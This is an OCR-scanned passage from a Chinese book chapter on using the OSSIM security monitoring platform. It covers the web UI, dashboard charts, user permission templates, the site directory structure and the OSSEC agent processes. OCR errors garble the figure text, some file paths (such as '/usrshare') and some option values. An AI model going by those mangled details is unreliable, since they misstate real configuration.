测 的 应 用 ， 重 点 介绍 了 异常 流量 的 分 析 方 法 。 同 时 详细 介绍 了 OSSIM 集成 的 两 款 重量 级 开源 
工具 Ntop 和 Nagios 的 应 用 和 处 理 故 障 的 方法 。 除 此 之 外 ， 对 OSSIM 集成 第 三 方 监控 软件 的 
方法 也 进行 了 讲解 。 
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第 9 章 
4OSSINM 应 用 实战 


从 本 章节 可 以 学 习 到 : 


OSSIM 4.2 5j 4.8 版 的 Web UI 差异 
OSSIM 站 点 结构 

SIEM 控制 台 日 志 过 滤 方 法 
仪表 盘 显 示 与 识别 

SQL 注入 攻击 行为 识别 及 案例 分 析 
资产 管理 

OSSEC 安装 

Openvas 漏洞 扫描 

蠕虫 异常 流量 监测 

报表 的 输出 

合 规 管理 ISO27001 、PCI-DSS 2.0 


使 用 OSSIM 系统 


用 户 接触 OSSIM 平台 最 多 的 是 Web UI， 通 过 Web 以 可 视 化 方式 轻松 获取 各 种 安全 分 析 
的 图 表 ， 作 为 普通 运 维 或 监控 人 员 ， 绝 大 多 数 操作 都 通过 Web UI 来 完成 ， 本 章 详 细 讲 解 如 何 
使 用 这 些 操 作 。 同 时 满足 一 些 开 发 者 的 需要 ， 某 些 关键 部 分 的 内 容 会 深入 讲解 。 


9.1.1 初 识 OSSIM Web UI 

如 果 读 者 部 署 过 OpenStack 基础 架构 即 服务 (IaaS ) 的 开源 解决 方案 ,可 能 知道 在 OpenStack 
中 附带 了 一 个 仪表 板 Web 应 用 程序 ， 在 这 个 Web UI 上 执行 启动 /关闭 虚拟 机 实例 ， 非常 方便 。 
OSSIM 提供 了 更 美观 的 统一 交互 式 图 形 界面 ， 通 过 这 个 界面 ， 管 理 员 可 以 轻松 查看 、 配 置 功 
能 模块 ， 包 括 定义 各 种 资产 ， 查 看 安全 策略 、 编 写 关联 规则 ， 还 可 以 将 你 现 有 的 各 种 B/S R 
统 集成 进来 。 随 着 OSSIM 版 本 不 断 升级 ， 其 Web UI 上 显示 的 各 种 仪表 盘 参 数位 置 也 会 有 所 
调整 ， 但 万 变 不 离 其 宗 ， 读 者 在 理解 了 本 节 介 绍 的 内 容 后 ， 就 能 自己 适应 今后 版 本 的 变化 。 

当 OSSIM 系统 安装 完毕 ， 重 启 后 进入 登录 界面 ， 上 面 将 显示 登录 IP， 这 时 就 可 以 在 客户 
机 上 登录 OSSIM Web 界面 , 在 浏览 器 地 址 栏 中 输入 https://IP/, 首次 登录 系统 输入 用 户 admin， 
这 时 系统 提示 修改 密码 。 


$893: OSSIM 应 用 实战 


图 9-1 为 OSSIM 4.2 系统 的 登录 界面 ， 可 以 明显 看 出 分 为 10 个 部 分 ， 各 部 分 功能 如 下 : 
iei vi] 


S wo 


ETO) -加 区 


User session: 17 minutes. 


图 9-1 OSSIM 42 系统 使 用 界面 


(1) 导航 栏 将 OSSIM 的 主要 功能 显示 在 10 个 模块 中 ， 每 个 模块 都 可 以 用 鼠标 灵活 拖 放 
到 其 他 位 置 以 符合 个 人 浏览 习惯 。 实 现 这 些 模块 的 主要 代码 在 /usrshare/ossim/www/ 目 录 下 ， 
每 个 子 系统 对 应 的 目录 和 文件 参见 9.2 节 内 容 。 

(2) 这 部 分 反映 了 所 监控 网 络 的 健康 程度 ， 在 图 中 系统 监控 程度 标记 为 红色 ， 表 示威 胁 
严重 。 如 图 9-2 所 示 。 


ENVIRONMENT SNAPSHOT ENVIRONMENT SNAPSHOT 
OPEN TICKETS 96 OPEN TICKETS 59 
UNRESOLVED ALARMS 6165 UNRESOLVED ALARMS 2 
SYSTEM HEALTH SYSTEM HEALTH 

"V2 SENSORS ACTIVE | | 3/3 SENSORS ACTIVE. 
LATEST SIEM ACTIVITY 1EPS V^ LATEST SIEM ACTMTY 1Eps 
MONITORED DEVICES 162 MONITORED DEVICES. 2 


NOTIFICATIONS (< 


NGTIRCATIONS ©) 


9-2 ”监控 网 络 健康 程度 


在 OSSIM 4.8 系统 中 ， 通 过 Threat Level (威胁 等 级 ) 显示 网 络 威胁 度量 情况 。 这 里 的 
Environment Snapshot 系统 环境 快照 反映 出 Web UI 下 Environment 菜单 下 的 总 体 情 况 , 默认 每 
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隔 5 秒 刷新 一 次 数据 ， 其 调用 源码 文件 参见 /usr/share/ossim/www/home/sidebar_ajax.php。 
G) 在 图 9-1 中 辐 、@、@@、@@、@、@@ 几 个 部 分 的 内 容 ， 属 于 整个 系统 的 数据 展现 层 ， 
可 使 运 维和 人 员 快 速 了 解 各 种 趋势 图 、 汇 总 表 、TOP N 、 安 全 事件 、 安 全 态势 等 信息 。 

在 图 9-1 中 的 @ 部 分 信息 反映 出 当天 的 安全 事件 和 日 志 事件 的 数量 ， 单 击 对 应 区 域 就 能 查看 
详情 。 用 波浪 图 的 方式 反映 了 日 志和 安全 事件 增长 趋势 。 这 些 数据 来 源 于 后 台数 据 库 
alienvaultalarm， 还 包括 Dashboards 一 Overview 一 Security 下 的 Security events:Top Alarms 的 内 容 。 

(4) 系统 对 告警 进行 统计 分 析 并 得 出 目前 的 状态 。 在 第 4 章 讲 过 OSSIM 将 网 络 威胁 级 
别 从 低 到 高 分 为 Low、Precaution、Elevated、High、Very High JE 5 个 等 级 (网 络 威胁 详情 见 
1.1.1)。 要 让 计算 机 能 够 识别 威胁 ， 一 种 可 行 的 方法 就 是 将 威胁 进行 等 级 化 ， 将 漏洞 进行 威胁 
等 级 划分 ， 对 每 个 漏洞 给 出 攻击 它 所 需要 的 等 级 ， 以 及 攻击 成 功 后 可 以 达到 的 等 级 ， 这 样 就 可 
以 通过 规则 和 漏洞 库 相 结合 来 实现 。 

在 OSSIM 首页 单 击 仪表 盘 ， 将 进入 Risk Metrics 风险 度量 界面 。 如 图 9-3 所 示 。 这 个 界 
面 上 会 具体 显示 设备 和 网 段 的 风险 值 。 现 实 的 服务 等 级 为 100% 表 示 ， 所 监控 网 络 比较 安全 ， 
这 个 值 越 低 表 示 网 络 越 不 可 靠 。 


E Threat Level , 


Very High 


7. 


er iskmeter ice Level 
| 一 一 

-  — 

e Rg 


COMPROMISE ATTACK 


cietat cita 
ciotat me mE 
woe eii orains eins oni rius 
mq VERTI 
Pvt. 010 Æ 5 2014-10-08 205500  - - Pvt.010 08205500  - 
Pvti72 WD 2014-10-08 205500  - - Pvt.172 


Pvt.192 E G 2014-10-08 20:5500  - - Pvt.192 
9-3 Risk 度量 
(5) 这 部 分 将 分 布 在 网 络 中 的 4 个 探 针 获取 的 数据 和 数据 源 (DS 位 于 Deployment 
Collection 一 Data Sources) 进行 比较 ， 并 根据 分 类 发 出 报警 显示 在 图 中 主 界 面 上 ， 用 不 同 颜色 
区 分 不 同 的 探测 器 , 当 用 鼠标 单 击 其 中 的 圆 点 就 会 显示 SIEM 详细 信息 。 对 于 OSSIM 4.8 以 上 
版 本 ， 数 据 源 的 Web 路 径 为 Configuration 一 Threat Intelligence 一 Data Source。 
C60 这 部 分 显示 系统 中 疑似 警报 〈 一 些 比较 可 疑 的 报警 信息 ) 和 打开 的 通知 单 。 
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CD 这 部 分 对 SIEM 事件 信息 显示 产品 类 型 的 Top10。OSSIM 的 产品 类 型 包括 : Alarm. 
Anomaly Detection、Application、Application Firewall、Authentication and DHCP、Data Protection、 
Database. Endpoint Security, Firewall, Honeypot, Infrastructure Monitoring, Intrusion Detection, Intrusion 
Prevention, Mail Security, Mail Server, Management Platform, Network Access Control, Network 
Discovery. Operation System, Other Devices. Proxy. Remote Application Access, Router/Switch, 
Server, Unified threat management, VPN, Vulnerability Scanner, Web Server 共 28 个 大 类 。 

(8) 此 部 分 就 是 用 饼 图 显示 事件 类 别 的 Top10。 

O) 此 按钮 显示 整个 系统 数据 快照 ， 侧 重 安全 事件 ， 方 便 掌握 工作 状况 。 

(10). 此 按钮 能 显示 系统 配置 信息 。 


在 OSSIM 4.3 系统 中 虽然 Web UI 界面 发 生 了 变化 ， 即 把 菜单 栏 由 传统 放置 在 左边 调整 到 
了 屏幕 上 端 ， 菜 单 进行 了 合理 地 优化 。 


9.1.2 OSSIM 4.8 界面 

读者 在 参考 前 面 介绍 的 OSSIM 4.2 版 本 后 继续 使 用 OSSIM 4.8 版 本 ， 对 前 端 界面 ， 会 有 
更 加 深入 的 体会 ， 新 版 中 无 论 在 功能 上 ,还 是 在 界面 风格 上 ， 比 以 往 版 本 有 了 较 大 改善 ， 其 功 
能 设计 合理 ， 主 要 栏目 Dashboards, Analysis, Environment, Reports, Configuration 都 体现 在 
浏览 器 的 顶 栏 。OSSIM 4.8 界面 如 图 9-4 所 示 。 


ANALYSIS. ENVIRONMENT reports 


events 


. 
9A 9 routery swn 
UNRESOLVED ALARMS VS e Mail Su SIEM: EVENTS BY SENSOR/DATA 
OPENED TICKETS e Drame SOURCE 


SEM: TOP 10 EVENT 
CATEGORIES 


9-4 OSSIM 4.8 界面 
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安全 事件 与 日 志 曲 线 特点 , 从 正常 网 络 运行 获得 的 监控 事件 数据 和 日 志 数 据 分 析 , 有 如 下 
情况 应 引起 管理 员 注意 ， 首 先 这 两 条 波浪 线 可 持续 ， 不 能 发 生 突变 (无 故 中 断 或 突然 增 大 或 减 
小 )， 类 似 图 9-5 所 示 的 情况 属于 不 正常 现象 。 


EXECUTIVE TICKETS SECURITY TAXONOMY 


LATEST SIEM VS LOGGER EVENTS 


4,896 Security events. 


| 


2,766 Log events. 
on 


OVERVIEW 


LATEST SIEM VS LOGGER FYENTS 


9-5 日 志 曲 线 发 生 突变 


其 次 这 两 条 线 所 反映 的 数值 是 相近 的 , 蓝 色 曲线 反映 了 日 志 随 时 间 波 动 , 绿色 曲线 反映 了 
安全 事件 随时 间 的 波动 情况 , 这 两 条 线 就 如 同名 卷 是 比翼 双飞 。 如 果 两 条 线 上 某 一 点 反映 的 数 
据 大 相 径 庭 〈 安 全 事件 数量 很 大 ， 而 日 志 条 目 非常 小 )， 说 明 可 能 是 某 些 事 件 或 日 志 的 数据 发 
生 中 断 或 被 删除 。 如 果 某 时 间 段 EPS 突然 变化 则 意味 着 日 志 流 被 阻 断 。 

最 后 单 击 曲线 上 的 关键 点 , 可 查看 事件 或 日 志 的 具体 数值 , 单 击 关键 点 能 看 到 具体 的 事件 
信息 ， 如 果 单 击 后 反应 迟钝 或 长 时 间 无 响应 ， 很 有 可 能 是 后 台数 据 库 VO 遇 到 瓶颈 。 仅 赁 菜单 
读者 不 易 对 OSSIM 功能 的 全 貌 进行 了 解 , 下 面 采用 思维 导 图 的 方式 将 它 的 主要 功能 予以 展示 。 
如 图 9-6 所 示 。 
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ER RE XE 


分 析 | 
网 络 抓 包 分 析 _ mn] fen) emm eee | 分 
opm pem l < 析 


ai 
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TURA EE 


H 
d 
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图 9-6 OSSIM 4.8 主要 结构 
由 于 篇 幅 限制 有 关 荣 单 的 描述 大 家 可 以 访问 http://chenguang.blog.51cto.com/350944/1579815。 


9.1.3 OSSIM 控制 中 心 : AlienVault Center 


OSSIM 的 控制 中 心 菜单 主要 集中 在 上 面 图 9-6 所 示 的 部 署 管理 区 域 ， 控 制 中 心 主要 作用 
就 是 向 管理 员 报告 当前 系统 和 网 络 状态 ， 以 便 管理 员 了 解 Server 和 Sensor 的 各 项 关键 参数 ， 
具体 访问 方式 在 Configuration 一 Deployment 一 Alienvault Center， 其 访问 的 AC (Alienvault 
Center). 信息 存储 在 OSSIM 库 的 /var/lib/mysql/avcenter/ 中 ,这 里 主要 了 解 整个 系统 状态 ， 如 图 
9-7 所 示 。 
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Software Updates | General Configuration | Network Configuration | Sensor Configuration | Log 


m 
EZER (PETER) 升级 常规 EB RARE ESSEE / ü 
SYSTEM INFORMATION 日 去 查看 
alienvault [192.168.91.222] RAM used [Free: 1.77 C8, Used: 6.04 CB, Total: 7.81 C8] Disk usage 


Wed Feb 11 08:57:28 2015 aar ux uS 


0 days, 7 hours, 13 minutes Swap used [Free: 865.99 MB, Used: O B, Total: 855.99 MB] 


0.85 (1 min) 0.39 (5 mins) 0.24 (15 mins) me | 


139 CPU used Intel(R) Core(TM) 15-4570 CPU @@ 3.20CHz - 1 core/s] 


图 9-7 系统 各 项 配置 
从 图 9-7 中 也 能 了 解 各 个 网 络 接口 卡 的 配置 ， 流 量 统计 信息 ， 软 件 系 统 状况 ， 包 括 NTP 
的 配置 情况 ， 这 里 还 包含 了 传感器 的 插件 配置 ， 工 作 状态 以 及 系统 详细 日 志 情况 。 


6 Free @ Used 


9.1.4 基于 角色 的 访问 权限 控制 
OSSIM 系统 提供 了 灵活 的 多 用 户 角 色 管 理 ， 不 同 角 色 具 有 不 同 的 权限 ， 实 现 方法 为 选择 
Configuration— Administration Users, W 9-8 所 示 。 


ADMINISTRATION 


USERS | MAIN BACKUP 
USERINFORMATION | ACTIVITY | TEMPLATES | STRUCTURE 
X 选择 新 建 技 钮 
EE 
HOW 四 [x] ( New ) woolrr ”beurre smecreo 
— 
tocn NAME eman vse status LANGUAGE 
aimn & jack conev@homallcom [Ergiss [v 


图 9-8 新 建 用 户 
首先 ， 选 择 新 建 模板 ， 模 板 名 称 为 “test”， 如 图 9-9 所 示 。 


ASK TO CHANGE PASSWORD AT NEXT LOGIN C ves ® No 


MAKE THIS USER A GLOBAL ADMIN C ves G No TEN 
MENU TEMPLATE * [e — — E E} 
ij Visibility VISIBILITY 
c ccv 


图 9-9 新 建 模板 


接着 输入 可 见 性 Visibility， 这 里 就 是 注册 时 的 组 织 名 称 ， 本 实例 中 为 “CCTV”， 然 后 选 
择 组 织 的 资源 , 可 以 选择 单 台 主机 , 也 可 以 是 一 个 网 段 , 最 后 在 列表 中 选择 资源 所 在 网 段 内 的 
传感器 ， 如 图 9-10、 图 9-11、 图 9-12 所 示 。 
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Bj Visibility — 
5 ccv [EC 
ALLOWED ASSETS. 
«» Assets from CCTV ASSETS 
= 出 Assets [L5cal-192-168.11.0-24 (192:168.11.0/24) 
由 g Asset Groups | 
= g Networks 


= g 192.168.11.---/-- 
g Local-192-168-11-0-24 (192.168.11.0/24) 
和 „ž Network Groups 
qr Sensor list 
immm 


SENSORS 
[ossim411 (192.168.11.105) 


图 9-10 选取 可 见 性 Visibility 与 所 监控 的 网 段 


NEW TEMPLATE 


~ 一 一 一 一 gm EE 


SELECT / UNSELECT ALL 


d Dashboard > Overview 
d Dashboard .> Overview > Manage Dashboards 
E Dashboard > Overview Metrics 
(C) Dashboard > Risk Maps 
Dashboard -> Risk Maps > Manage Risk Maps 


C Dashboard > OTX (Open Threat Exchange) 


图 9-11 选择 需要 的 菜单 


ASK TO CHANGE PASSWORD AT NEXT LOGIN — () Yes (9) No 
MAKE THIS USER A GLOBAL ADMIN D Yes @ No. 
MENU TEMPLATE * 4 mdna "o uw 
Visibility 12345 
ij My Company 


" 


图 9-12 ”选择 模板 


当选 择 模板 后 , 接着 选取 Visibility 一 MyCompany, 以 及 所 监控 的 资产 , 下 一 步 选 定 Sensor, 
最 后 输入 admin 用 户 密码 ， 添 加 用 户 工作 即 完 成 ， 如 图 9-13 所 示 。 
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v ALLOWED ASSETS 
ALLOWED ASSETS 


«» Assets from My Company ASSETS 
[o132-168-11-170 13718817170] 
VirtuelUSMAllInOne (192. 

XP (192.168.11.23) 


8| 192.168.11. CURES 
j| 192.168.11. pa 


-112 docalro sensors 
jj 192.168.11.170 (hest-192-188-11-170) — |VircusiUSMAliinOne (192.168. 11.105) 
= dy Asset Groups 
* dd Networks 
4, Network Groups z 
r "Sensor list 
va 


图 9-13 设 定 资产 和 Sensor 
用 户 添加 完毕 ， 需 要 对 用 户 权限 进行 实际 登录 测试 ， 因 为 有 些 菜单 的 内 容 之 间 相互 关联 ， 
比如 Analysis 一 alarm 和 SIEM 之 间 存 在 内 在 联系 ， 所 以 指派 选项 时 需要 全 选 ， 效 果 如 图 9-14 
所 示 。 在 Dashboards 仪表 盘 展 示 的 各 种 可 视 化 内 容 ， 也 是 从 各 种 安全 事件 中 抽取 ， 所 以 在 初 
次 分 配 权限 时 ， 也 应 当选 择 ， 而 对 于 Environment, Reports. Configuration 设计 资产 、 流 量 和 
系统 配置 管理 的 部 分 ， 则 可 以 分 配给 权限 更 高 的 用 户 〈 仅 次 于 admin). 
am 


WELCOME TEST SETTINGS SUPPORT LOGOUT 


DASHBOARDS 


OVERVIEW 


EXECUTME SECURITY opi 
LATESTSIMVSLOGGER — 5 sEm: Top 10EVENTSBY — 95 THAEAT LEVEL 


OVERVIEW 


PRODUCT TYPE 


图 9-14 验证 效果 
通过 多 用 户 管理 可 以 将 繁杂 的 安全 分 析 过 程 , 分 解 到 多 个 用 户 的 控制 台 上 , 这 样 可 以 加 快 


分 析 进 度 和 准确 性 。 注意: 以 上 讲述 了 对 于 初次 涉及 权限 设 定 的 用 户 ， 通 常 我 们 可 以 在 
Templates 中 实现 ， 然 后 在 新 建 用 户 时 直接 调用 模板 ， 这 样 操作 更 方便 。 如 图 9-15 所 示 。 


USERS MAIN Backup 
USERINFORMATION | ACTIVITY | TEMPLATES STRUCTURE 
a5 [v] NEW MODIFY DELETESE 
NAME USERS ASSIGNED SECTIONS ALLOV 
All Sections 100% 


图 9-15 用 户 权限 
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图 中 明确 地 标识 出 每 个 用 户 所 控制 系统 的 比例 ，admin 用 户 拥有 完全 控制 权 ，OSSIM 用 
户 拥有 26% 的 控制 权 ， 单 击 某 个 用 户 还 可 查看 详情 。 


9.4.5 仪表 盘 详解 


OSSIM 系统 可 以 通过 仪表 盘 展 示 数 据 视 图 ， 而 且 可 以 自 定义 。 仪 表盘 (Dashboard) 是 一 
类 模仿 汽车 速度 表 的 一 系列 图 表 , 特点 是 简单 、 直 观 和 高 效 。 下 面 看 看 OSSIM 几 个 典型 图 例 ; 


(1) 雷达 图 

雷达 图 也 称 为 蜘蛛 图 或 星 状 图 ， 如 图 9-16 所 示 ， 它 是 一 种 以 二 维 形式 展示 多 维 数据 的 图 
形 。 雷 达 图 从 中 心 点 辐射 出 多 条 坐标 轴 , 每 一 份 多 维 数据 ,在 每 一 维度 上 的 数值 都 占用 一 条 坐 
标 轴 ， 并 和 相 邻 坐标 轴 上 的 数据 点 连接 起 来 ， 形 成 一 个 多 边 形 。 


SIEM: EVENTS BY SENSOR/DATA 
SOURCE 


d 2 @ alienvault 


e @ SENSOR 
* sensor2 
(f Noar 


(1) 老 款式 样 (2) 新 款式 样 
图 9-16 新 旧 雷 达 图 对 比 
雷达 图 周边 是 按 插 件 统计 的 事件 名 称 、 点 、 线 、 面 所 连 成 的 区 域 可 以 分 析出 事件 的 多 少 ， 
从 而 看 出 严重 性 ， 如 果 将 相 邻 坐标 轴 上 的 刻度 点 也 连接 起 来 以 便于 读 取 数 值 。 雷 达 图 的 特点 ， 
数量 越 大 越 靠近 边缘 ， 越 小 越 接近 圆心 。 在 OSSIM 中 ， 不 同 传感器 收集 到 的 事件 通过 不 同 颜 
色 可 以 反映 在 一 个 雷达 图 内 。 
(2) 饼 图 、 环 形 图 、 柱 状 图 


数据 可 视 化 能 帮助 用 户 理解 数据 ， 在 OSSIM 仪表 盘 中 大 量 使 用 了 各 种 表现 形式 的 图 表 ， 
其 中 又 以 饼 图 、 环 形 图 、 柱 状 图 和 波浪 图 最 为 常用 ， 如 图 9-17 所 示 。 


(^) "wmm 


GO 饼 图 b) 环形 图 Ce) 柱状 图 
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DESTINATION UOP PORTS 


|4668 
CEE G4 events 
x 111533 4665 Je 
3478 
— 8623 1 10h 11h 12h 13h 14h 15h 16h 17h 18h 19h 20h 21h 22h 23h Oh 
d) 条 状 图 Ce) 气泡 图 (f) 波浪 图 


图 9-17 OSSIM Web UI 中 的 常用 图 形 


在 OSSIM 的 仪表 盘 上 ， 采 用 了 饼 图 和 柱状 图 形式 ， 因 为 人 们 在 理解 这 种 形象 的 图 形 比 字 
符 要 容易 得 多 。 大 家 或 许 会 问 , 仪表 盘 中 为 什么 有 饼 图 和 柱状 图 等 多 种 表现 形式 呢 ? 先 拿 首页 
中 显示 的 “SIEM: TOP 10 Events by Product” 这 种 饼 图 进行 解释 ， 从 表面 上 看 ， 这 种 饼 图 在 
数据 可 视 化 方面 表现 出 色 , 但 在 一 幅 饼 图 中 若 有 多 个 相似 值 , 大 多 数 人 无 法 准确 区 分 它们 的 差 
异 , 除非 将 鼠标 移动 到 扇面 之 上 时 , 会 显示 报警 类 型 及 数量 大 小 , 而且 饼 图 没有 明显 的 开始 和 
结束 标志 ， 这 使 得 人 们 难以 集中 注意 力 关注 某 一 类 报警 ， 尤 其 是 饼 图 在 表达 多 种 类 型 报警 时 ， 
各 个 扇面 之 间 很 难保 持 高 对 比 度 实 际 上 是 图 论 中 学 过 的 扇面 的 着 色 问题 )， 但 柱状 图 却 能 避 
免 这 些 问 题 ， 这 些 柱状 图 ， 往 往 以 坐标 的 方式 提供 参考 系 ， 有 X 轴 和 YY 轴 ， 可 以 有 效 而 准确 
地 将 数据 展现 给 入 们 。 如 图 9-18 所 示 。 


SIEM: TOP 10 EVENT CATEGORIES 


SIEM: TOP 10 EVENTS BY PRODUCT TYPE 


UNRESOLVED ALARMS VS OPENED 


6 ums © Tries 
9-18. 饼 图 与 柱状 图 表达 方式 对 比 


(GO 迷你 图 

迷你 图 是 一 种 文字 大 小 般 的 图 形 ， 它 们 可 以 绘制 出 迷你 的 折线 图 和 迷你 的 柱状 图 ， 如 图 
9-19 所 示 。 在 Environment Snapshot 系统 环境 快照 、 流 量 抓 包 以 及 漏洞 扫描 等 界面 中 都 能 发 现 
它 的 身影 ， 在 这 种 迷你 折线 图 中 , 图形 中 最 高 点 和 最 低 点 都 添加 了 数值 ， 能 够 节省 空间 ， 也 能 
表达 准确 的 、 准 实时 的 内 容 。 


MONITORED DEVICES 20 VULNS. TREND / SCAN PROGRESS ACTION 
Lx uou 
cooo 72% 


9-19. OSSIM 中 使 用 的 迷你 图 
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OSSIM 的 Web UI 菜单 结构 


了 解 OSSIM Web 的 站 点 目录 有 利于 开发 Web 界面 ， 下 面 基 于 OSSIM 4.8 版 本 予以 介绍 。 
对 于 OSSIM 4.2 版 的 站 点 目录 结构 在 (UNIX/Linux 网 络 日 志 分 析 与 流量 监控 》 一 书 中 14.5 节 ， 
OSSIM 4.8 的 Web 目录 结构 如 表 9-1 所 示 。 


表 9-1 OSSIM 4.8 站 点 目录 结构 
一 级 菜单 二 级 菜单 调用 页 面 


DASHBOARDS Overview ./dashboard/index.p 
-/deployment/index.php 
risk maps/view.php 


Risk Maps 

OTX 
Analysis Alarms Jalarm/alarm console.php 

Group View Jalarm/alarm group console.php 


Security Events (SIEM) | Jforensics/base qry main.php 


Real Time -/control panel/event panel.php 

Raw Logs 
Tickets 
Asset Discove -/netscan/index.php 

Groups&Networks Jassets/list view.php 

Network Groups /netgroup/netgroup.php 

Vulnerabilities Overview: ./vulnmeter/index.php 


Scan Jobs:./vulnmeter/manage jobs.php 


Settings: /vulnmeter/webconfig.php 
Threat Database:./vulnmeter/threats-db.php 


Profiles 
NetFlow 
Traffic capture 
Availability -/nagios/index.php. 

Detection Jossec/status.php 


Agents:./ossec/agent.php 
Agentless:./ossec/agentless.php 

Edit Rules:./ossec/index.php 

Config: Jossec/config.php 

Ossec control:./ossec/ossec control.php 
Wireles IDS: /wireless/index.php 
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GÈR) 
一 级 菜单 二 级 菜单 
REPORTS Alarms Report 生成 文件 :/report/os_reports/Alarms/general.php 
Business&Compliance ISO PCI Repot 生成 文 
ff ./report/os_reports/BussinessAndComplianceISOPCI/general.php 
Tickets Status Report 生成 文 
件 :./report/os_reports/Tickets/general.php 
SIEM Events 生成 文件 : Jreports/os reports/Siem/general.php 
Vulnerabilities Report 生成 文件 ，./vulnmetertr respdf.php 
CONFIGURATION Administration session/users.php 
ity:/conf/userlog.php 


-/conf/index.php 
BACKUP ./backup/index.php 


Deployment Alienvault Center:./av center/index.php 
Sensors: /server/sensor.php 
Servers: /server/server.php 


Scheduler:/av inventory/index.php 


Locations: /sensor/locations.php 


Threat Intelligence | Policy:./policy/policy.php 


ComplianceMapping: /compliance/iso27001.php 
PCIDSS2.0:./compliance/pci-dss.php 


Data Source:./conf/plugin.php 
Data Source Groups: /policy/plugi 
Taxonomy: /conf/category.php. 


Knowledge Base:/repository/index.php 


SETTINGS My Profile -/session/user form.php. 
Current Sessions ./userlog/opened sessions.php 
User Activity -/userlog/user action log.php. 
Support Help -/help/index.php 
Downloads /downloads/index.php 


E 网 站 根 目录 路 径 位 于 /usrshare/ossim/www/。 | 
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品 . OSSEC 架构 与 配置 


9.3.1 OSSEC 架构 

OSSEC 是 一 款 开 源 的 入 侵 检测 系统 ， 采 用 了 客户 端 /服务 器 模式 ， 客 户 机 通过 客户 端 程序 
将 数据 发 送 到 服务 器 端 分 析 ， 主 要 功能 包括 日 志 分 析 、 完 整 性 检查 、rootkit 检测 等 。OSSEC 
被 集成 到 OSSIM 平台 之 后 ， 除 了 具有 日 志 分 析 、 入 侵 检测 系统 功能 外 ， 还 添加 了 日 志 关联 分 
析 报 警 功能 。 当 客户 机 通过 客户 端 程序 ， 将 数据 发 回 服务 器 端 进行 关联 分 析 之 后 ， 把 结果 存 入 
数据 库 并 发 出 报警 。OSSIM 中 集成 的 OSSEC 和 单独 安装 的 OSSEC 系统 最 大 的 区 别 就 是 增加 
了 关联 分 析 引 擎 ， 其 架构 如 图 9-20 所 示 。 

监控 主机 OSSIM 传感器 OSSIM 服务 器 


tail -f IVar'ossec/logs/aleris/alerts.log 


Remoted 


Logcollector 
Ossim-server 
Syscheckd Agentd 


Correlation 


Rootcheckd Risk assessment 


LOP 181A RCREOSSECIERE BS, Decode B 
A J n Logger 


= Y ~ 一 一 
OSSEC Agent OSSEC Server Ossim Agent 


图 9-20 OSSIM 中 嵌入 OSSEC 架构 


从 图 9-20 可 知 OSSEC 的 事件 报警 流程 : Agentd 一 UDP 1514 一 Remoted — Analysisd 一 
Aerts.log — Ossim-agent Correlation 一 Alarm。OSSIM 中 的 OSSEC 模块 整体 分 为 Agent、 
Server 和 关联 分 析 模块 ， 下 面 将 详细 分 析 各 进程 的 功能 。 


9.3.2 OSSEC Agent 端 进程 
下 面 以 Linux 平台 为 例 ，Agent 主要 包含 以 下 几 个 进程 : 


(1) logcollector， 读 取 从 syslog、wmi 收集 的 日 志 ， 进 程 名 称 为 ossec-logcollector。 
(2) syscheckd， 文 件 系统 完整 性 检查 (File Integrity Check), Windows 注册 表 完 整 性 检 
查 ， 进 程 名 为 ossec-syscheckd。 它 是 OSSEC 内 部 完整 性 检测 进程 的 名 称 ， 它 周期 性 检查 是 否 
有 任何 配置 文件 (或 Windows 注册 表 ) 发 生 改 变 。 当 系统 的 完整 性 被 改变 时 ， 它 能 够 通过 比 
较 文 件 的 MD5 校 验 和 发 现 问题 。 
Syscheck 工作 原理 : 代理 默认 每 6 小 时 (在 /var/ossec/etc/ossec.conf 文件 的 <frequency> 字 
段 定义 ，21600 秒表 示 频 率 为 6 小 时 ) 扫描 一 次 系统 ， 并 发 送 校 验 和 “(checksum) 到 Server 
端 。Server 端 存储 这 些 校 验 和 文件 ， 并 比 对 他 们 的 差异 。 如 果 发 现任 何 改变 ， 将 会 发 送 报警 。 
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数据 存放 位 置 在 /var/ossec/queue/syscheck/。 

在 ossec.conf 配置 文件 里 的 syscheck 项 ， 提 供 了 一 个 将 要 被 监控 的 目录 (/etc、/usr/bin、 
/usr/sbin) 和 文件 (/root/myfile、/var/src/sys )，check_all 选项 会 检查 文件 的 md5、shal、owner 
和 权限 ， 对 ossec.conf 相应 字段 进行 如 下 修改 。 


如 果 不 想 监 控 某 些 文件 和 目录 ， 可 以 用 ignore 选项 。 下 面 看 一 个 系统 自 带 的 例子 ， 还 是 
打开 /var/ossec/etc/ossec.conf 配置 文件 ， 修 改 如 下 内 容 : 


在 ignore 选项 中 ， 该 类 型 属性 可 以 设置 为 sregex， 指 定 一 个 正则 表达 式 语法 。 


本 地 规则 可 以 修改 需要 更 改 的 指定 文件 和 目录 。 


在 上 面 的 例子 中 ， 当 /var/www/docs 目录 中 的 文件 发 生 改 变 时 , 将 会 产生 一 个 严重 的 报警 。 
在 Linux 和 Windows 中 ，OSSEC 支持 实时 监控 文件 完整 性 检查 ，directories 选项 可 以 指定 要 
监控 的 文件 和 目录 ， 并 设置 realtime="yes "。 


在 该 示例 中 ， 目 录 /etc、/usr/bin ~ /usr/sbin 会 被 实时 监控 。 


实时 监控 并 不 会 立即 开始 ， 首 先 ossec-syscheckd 需要 扫描 文件 系统 ， 并 添加 每 一 个 子 目 


录 到 实时 队列 。 完 成 这 些 工作 约 30 分 钟 。 实 时 监控 仅 对 目录 有 效 ， 可 以 监控 /etc 或 者 
Windows 系统 下 的 C:\Program Files\ 目 录 ， 但 不 能 为 单独 的 文件 。 
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OSSEC 系统 可 比较 文件 的 变化 ,OSSEC 支持 发 送 比较 报告 功能 ， 配 置 syscheck 显示 文件 
比较 的 不 同 很 简单 ， 只 要 添加 report_changes="yse" 到 directories 选项 即 可 。 


MI i syscheck 停止 对 系统 进行 扫 措 ， 只 需 在 ossec.conf 中 指定 <scan_on_start> 选项 为 mo " 


即 可 。 


(3) rootcheckd: 用 来 监控 流氓 软件 、 监 控 所 有 网 络 接口 和 rootkits 检测 ， 进 程 名 为 
Tootcheckd 。 
OSSEC HIDS 会 在 每 个 安装 代理 的 系统 中 运行 rootkit 检测 。Rootkit 每 120 分 钟 会 探测 任 
何 可 能 已 经 安装 的 rootkit 和 日 志 分 析 及 安全 性 检测 ，OSSIM 系统 中 集成 的 OSSEC HIDS 将 在 
目录 /var/ossec/etc/shared/ 中 读 rootkit_files.txt 文件 ,其 中 包含 了 使 用 文件 和 rootkit 的 基本 数据 。 
我 们 使 用 所 有 这 些 系 统 调用 ， 有 一 些 内 核 级 rootkits 从 系统 调用 中 隐藏 了 一 些 文件 。 


